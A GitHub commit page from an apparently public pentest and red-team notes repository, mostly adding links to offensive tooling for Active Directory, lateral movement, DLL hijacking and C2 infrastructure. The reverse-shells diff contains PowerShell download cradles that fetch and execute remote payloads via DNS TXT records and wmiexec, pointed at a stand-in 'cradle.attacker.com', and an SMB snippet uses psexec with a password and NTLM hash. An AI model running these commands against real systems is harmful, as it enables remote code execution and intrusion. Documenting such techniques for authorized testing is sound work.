Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
snovvcrash committed May 8, 2023
1 parent 1b0a284 commit 5d434ce
Show file tree
Hide file tree
Showing 10 changed files with 33 additions and 4 deletions.
2 changes: 2 additions & 0 deletions pentest/infrastructure/ad/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -61,6 +61,7 @@
- [GOAD - part 10 - Delegations](https://mayfly277.github.io/posts/GOADv2-pwning-part10/)
- [GOAD - part 11 - ACL](https://mayfly277.github.io/posts/GOADv2-pwning-part11/)
- [GOAD - part 12 - Trusts](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
- [GOAD - part 13 - Having fun inside a domain](https://mayfly277.github.io/posts/GOADv2-pwning-part13/)
- [https://github.com/Orange-Cyberdefense/GOAD](https://github.com/Orange-Cyberdefense/GOAD)


Expand Down Expand Up @@ -433,6 +434,7 @@ PV3 > Get-DomainGPO -Name "<DN>" -Properties DisplayName
* [https://github.com/maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows)
* [https://github.com/icyguider/MoreImpacketExamples](https://github.com/icyguider/MoreImpacketExamples)
* [https://tools.thehacker.recipes/impacket](https://tools.thehacker.recipes/impacket)
* [https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html](https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html)
* [https://habr.com/ru/post/703332/](https://habr.com/ru/post/703332/)

Install:
Expand Down
2 changes: 2 additions & 0 deletions pentest/infrastructure/ad/credential-harvesting/README.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,7 @@
# Credentials Harvesting

- [https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary](https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary)




Expand Down
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/credential-harvesting/lsa.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@ description: Local Security Authority

* [https://www.passcape.com/index.php?section=docsys&cmd=details&id=23](https://www.passcape.com/index.php?section=docsys&cmd=details&id=23)
* [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets)
* [https://github.com/laxa/SharpSecretsdump](https://github.com/laxa/SharpSecretsdump)



Expand Down
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/kerberos/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -68,6 +68,7 @@ python3 keytab.py keytab.kt
- [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)
- [https://xakep.ru/2023/04/04/no-mimikatz/](https://xakep.ru/2023/04/04/no-mimikatz/)
- [https://github.com/MzHmO/articles/tree/main/Ticket%20Injector](https://github.com/MzHmO/articles/tree/main/Ticket%20Injector)
- [https://github.com/MzHmO/PowershellKerberos](https://github.com/MzHmO/PowershellKerberos)



Expand Down
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/lateral-movement/rpc.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,7 @@ description: Remote Procedure Call
# RPC

- [https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/](https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/)
- [https://github.com/s0i37/lateral](https://github.com/s0i37/lateral)



Expand Down
8 changes: 8 additions & 0 deletions pentest/infrastructure/ad/lateral-movement/smb.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,3 +20,11 @@ description: Server Message Block
$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/[email protected] powershell
```




## SMB Pivoting

- [https://habr.com/ru/articles/460659/](https://habr.com/ru/articles/460659/)
- [https://github.com/mis-team/rsockspipe](https://github.com/mis-team/rsockspipe)
10 changes: 10 additions & 0 deletions pentest/infrastructure/networks/scanning.md
Original file line number Diff line number Diff line change
Expand Up @@ -487,6 +487,16 @@ $ python3 gateway-finder-imp.py -D file_with_dst_IPs.txt -M file_with_nex_hop_MA



### tracebuster

- [https://github.com/s0i37/net/blob/main/tracebuster.py](https://github.com/s0i37/net/blob/main/tracebuster.py)

```
$ python3 tracebuster.py 4 udp 192.168.1.0/24 53 2>/dev/null
```



### NetBIOS


Expand Down
4 changes: 2 additions & 2 deletions pentest/shells/reverse-shells.md
Original file line number Diff line number Diff line change
Expand Up @@ -124,9 +124,9 @@ $stream.Dispose()
- [https://github.com/mdsecactivebreach/PowerDNS](https://github.com/mdsecactivebreach/PowerDNS)

```
'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.megacorp.com"""" 16).Strings[0]'
'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'
wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.megacorp.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
```


Expand Down
6 changes: 4 additions & 2 deletions redteam/infrastructure.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

- [https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d](https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d)
- [https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4](https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4)
- [https://rastamouse.me/sharpc2-https-with-redirector/](https://rastamouse.me/sharpc2-https-with-redirector/)
- [https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
- [https://github.com/mgeeky/RedWarden](https://github.com/mgeeky/RedWarden)
- [[PDF] Orchestrating Resilient Red Team Operations (Yiannis Ioannides)](https://github.com/secgroundzero/BSides-Cyprus-2019/blob/master/bsides_Cyprus_Yiannis.pdf)
Expand Down Expand Up @@ -285,8 +286,8 @@ Install from apt:

```
$ sudo apt install debian-keyring debian-archive-keyring apt-transport-https -y
$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc
$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/gpg.key | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc
$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt | sudo tee /etc/apt/sources.list.d/caddy-stable.list
$ sudo apt update
$ sudo apt install caddy -y
```
Expand Down Expand Up @@ -324,6 +325,7 @@ Config sample to act as a reverse proxy:
log
#debug
admin off
#default_sni example.com
#auto_https disable_redirects
}
Expand Down
2 changes: 2 additions & 0 deletions redteam/maldev/dll-hijacking.md
Original file line number Diff line number Diff line change
Expand Up @@ -47,6 +47,8 @@ PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDri

## Tools

- [https://github.com/monoxgas/Koppeling](https://github.com/monoxgas/Koppeling)
- [https://github.com/Flangvik/SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
- [https://github.com/tothi/dll-hijack-by-proxying](https://github.com/tothi/dll-hijack-by-proxying)


Expand Down

0 comments on commit 5d434ce

Please sign in to comment.